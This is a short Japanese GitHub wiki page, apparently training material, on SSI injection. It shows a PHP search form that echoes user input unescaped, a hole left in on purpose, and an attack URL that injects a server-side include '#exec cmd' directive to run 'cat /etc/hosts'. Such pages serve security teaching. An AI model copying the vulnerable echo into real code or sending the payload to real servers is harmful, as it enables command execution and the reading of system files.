SSIインジェクション 01 - yujitounai/helloworld GitHub Wiki

SSIインジェクション/SSI Injection

脆弱なソースコード(php)

反射型XSSと同じコード

<div class="box">
<form method="get" action="">search
<input name="word" type="text">
<input type="submit">
</form>
</div>
<?php
echo "<h1>".filter_input(INPUT_GET, 'word')."</h1>";
?>

攻撃コード

ssi-01.php?word=<%21--%23exec+cmd%3D"cat+%2Fetc%2Fhosts"+-->#exec%20cmd="cat%20/etc/hosts"%20-->

⚠️ GitHub.com Fallback ⚠️